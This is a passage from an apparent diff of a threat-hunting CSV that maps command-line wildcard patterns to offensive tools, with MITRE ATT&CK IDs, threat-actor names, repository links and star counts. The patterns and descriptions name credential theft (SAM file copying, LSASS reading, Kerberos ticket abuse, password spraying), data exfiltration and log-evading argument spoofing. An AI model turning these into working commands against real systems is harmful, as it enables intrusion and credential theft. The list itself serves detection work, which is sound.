T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* --random_user_agent*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" -"* --random-agent *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --random-agent *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "* rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "* -ratel *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* RCE.py -*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* rde1 crde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rde1 srde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rde1 srde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rde1 srde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rdp * -u * -p * --nla-screenshot*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* rde1 crde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rdp * -u * -p * --nla-screenshot*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* rdp-enum-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rdp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rdp-vuln-ms12-020.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ReadFromLsass*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* -RealCmdLine *","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" -"* -RealCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"* -RealCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "* realvnc-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* rec2 crde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rec2 crde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rec2 crde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rec2 crde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* redis-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* redis-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* redsocks.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "* --reflective-injection *","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"* -Registry -AtStartup *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Registry -AtStartup *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -relayserver *:5555*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "* -remote -bindPipe * -bindPort * -security*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral 
movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" -"* -Remote -ExchHostname *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"* -RemoteDllHandle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Remote -ExchHostname *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"* -RemoteDllHandle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -remotefilepath *\\*.wav*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "* --remote-impersonation*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different 
permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"* renew *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* renew */ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* renew *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* renew */ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* repo -u https://github.com/*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "* req -username * -p * -ca * -target * -template * -upn *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -request -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -request -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a 